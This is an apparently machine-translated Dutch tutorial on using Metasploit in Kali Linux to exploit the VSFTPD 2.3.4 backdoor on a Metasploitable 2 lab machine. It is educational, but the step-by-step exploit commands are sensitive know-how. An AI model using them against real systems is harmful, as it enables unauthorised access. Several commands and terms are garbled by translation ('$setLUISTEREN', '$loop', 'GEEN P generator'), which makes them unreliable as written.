Metasploit in Kali Linux 2020

Metasploit Kali Linux 2020



Penetratietesten met Kali Linux


Het internet staat vol met lurkers met kwaadaardige bedoelingen die toegang willen krijgen tot netwerken en hun gegevens willen misbruiken terwijl ze detectie ontwijken. Het heeft alleen zin om de beveiliging van een netwerk te waarborgen door de kwetsbaarheden ervan te meten. Penetratietesten of ethisch hacken is de manier waarop we netwerken of servers testen op voorspelbare doelen door alle mogelijke inbreuken te lokaliseren die een hacker zou kunnen gebruiken om toegang te krijgen, waardoor beveiligingsrisico's worden verminderd. Penetratietesten worden vaak uitgevoerd via softwaretoepassingen, waarvan Kali Linux de meest populaire is, bij voorkeur met het Metasploit-framework. Blijf tot het einde om te leren hoe je een systeem kunt testen door een aanval uit te voeren met Kali Linux.

Een inleiding tot Kali Linux en Metasploit-framework

Kali Linux is een van de vele geavanceerde systeembeveiligingstools die zijn ontwikkeld (en regelmatig bijgewerkt) door Offensive Security. Het is een op Linux gebaseerd besturingssysteem dat wordt geleverd met een reeks tools die voornamelijk zijn ontworpen voor penetratietests. Het is vrij eenvoudig te gebruiken (tenminste in vergelijking met andere pen-testprogramma's) en ingewikkeld genoeg om adequate resultaten te presenteren.







De Metasploit-framework is een open-source modulair penetratietestplatform dat wordt gebruikt om systemen aan te vallen om te testen op beveiligingslekken. Het is een van de meest gebruikte tools voor penetratietesten en is ingebouwd in Kali Linux.



Metasploit bestaat uit datastore en modules. Met Datastore kan de gebruiker de aspecten binnen het raamwerk configureren, terwijl modules op zichzelf staande codefragmenten zijn waaraan Metasploit zijn functies ontleent. Omdat we ons concentreren op het uitvoeren van een aanval voor pentesten, houden we de discussie tot modules.



In totaal zijn er vijf modules:





Uitbuiten – ontwijkt detectie, breekt in op het systeem en uploadt de payload-module
Laadvermogen – Geeft de gebruiker toegang tot het systeem
Extra –ondersteunt inbreuk door taken uit te voeren die geen verband houden met uitbuiting
Na - Operatie – geeft verdere toegang tot het reeds gecompromitteerde systeem
GEEN P generator – wordt gebruikt om beveiligings-IP's te omzeilen

Voor onze doeleinden gebruiken we Exploit- en payload-modules om toegang te krijgen tot ons doelsysteem.



Uw pentestlab opzetten

We hebben de volgende software nodig:

Kali-Linux:

Kali Linux zal worden bediend vanaf onze lokale hardware. We zullen het Metasploit-framework gebruiken om de exploits te lokaliseren.

Een hypervisor:

We hebben een hypervisor nodig omdat het ons in staat stelt om een virtuele machine , waardoor we tegelijkertijd aan meer dan één besturingssysteem kunnen werken. Het is een essentiële voorwaarde voor penetratietesten. Voor soepel zeilen en betere resultaten raden we aan om ofwel Virtualbox of Microsoft Hyper-V om de virtuele machine te maken op .

Metasploitable 2

Niet te verwarren met Metasploit, een raamwerk in Kali Linux, metasploitable is een opzettelijk kwetsbare virtuele machine die is geprogrammeerd om cyberbeveiligingsprofessionals op te leiden. Metasploitable 2 heeft tonnen bekende testbare kwetsbaarheden die we kunnen misbruiken, en er is voldoende informatie beschikbaar op internet om ons op weg te helpen.

Hoewel het aanvallen van het virtuele systeem in Metasploitable 2 eenvoudig is omdat de kwetsbaarheden goed zijn gedocumenteerd, heb je veel meer expertise en geduld nodig met echte machines en netwerken waarvoor je uiteindelijk de penetratietest zult uitvoeren. Maar het gebruik van metasploitable 2 voor pentesten is een uitstekend startpunt om meer te weten te komen over de methode.

We zullen metasploitable 2 gebruiken om onze pen-testen te bevorderen. Je hebt niet veel computergeheugen nodig om deze virtuele machine te laten werken, een harde schijf van 10 GB en 512 MB RAM zou prima moeten volstaan. Zorg ervoor dat u de netwerkinstellingen voor Metasploitable wijzigt in de host-only adapter terwijl u deze installeert. Eenmaal geïnstalleerd, start Metasploitable en log in. Start Kali Linux op zodat we het Metasploit-framework kunnen laten werken om onze tests te starten.

Gebruik maken van VSFTPD v2.3.4 Backdoor-opdracht uitvoeren

Met alle dingen op hun plaats, kunnen we eindelijk zoeken naar een kwetsbaarheid om te misbruiken. Je kunt op internet zoeken naar verschillende kwetsbaarheden, maar voor deze tutorial zullen we zien hoe VSFTPD v2.3.4 kan worden misbruikt. VSFTPD staat voor een zeer veilige FTP-daemon. We hebben deze gekozen omdat het ons volledige toegang geeft tot de interface van Metasploitable zonder toestemming te vragen.

Start de Metasploit-console. Ga naar de opdrachtprompt in de Kali Linux en voer de volgende code in:

$sudomsfconsole

Typ nu met de console geopend:

$zoeken vsftpd

Dit brengt de locatie van de kwetsbaarheid naar voren die we willen misbruiken. Om het te selecteren, typt u

$gebruik exploit/unix/ftp/vsftpd_234_backdoor

Om te zien welke verdere informatie nodig is om de exploitatie op te starten, typt u

$opties weergeven

De enige informatie van substantieel belang die ontbreekt, is het IP-adres, dat we zullen verstrekken.

Zoek het IP-adres op in de metasploitable door te typen

$ifconfig

In zijn opdrachtshell

Het IP-adres staat aan het begin van de tweede regel, zoiets als:

#inet-adres: 10.0.2.15

Typ deze opdracht om Metasploit naar het doelsysteem te leiden en de exploit te starten. Ik gebruik mijn ip, maar het zal resulteren in een fout, maar als je een ander slachtoffer-IP gebruikt, krijg je resultaten van de exploit

$setLUISTEREN[slachtoffer IP]

$loop

Nu, met volledige toegang tot Metasploitable, kunnen we zonder enige beperking door het systeem navigeren. U kunt geclassificeerde gegevens downloaden of iets belangrijks van de server verwijderen. In echte situaties, waar een blackhat toegang krijgt tot zo'n server, kunnen ze zelfs de CPU afsluiten, waardoor andere computers die ermee verbonden zijn ook crashen.

Dingen afronden

Het is beter om problemen vooraf op te lossen dan erop te reageren. Penetratietesten kunnen u veel gedoe en inhaalbewegingen besparen als het gaat om de beveiliging van uw systemen, of het nu gaat om een ​​enkele computer of een heel netwerk. Met dit in gedachten is het handig om basiskennis te hebben over pentesten. Metasploitable is een uitstekende tool om de essentie ervan te leren, omdat de kwetsbaarheden bekend zijn, dus er is veel informatie over. We hebben slechts aan één exploit met Kali Linux gewerkt, maar we raden je ten zeerste aan om er verder naar te kijken.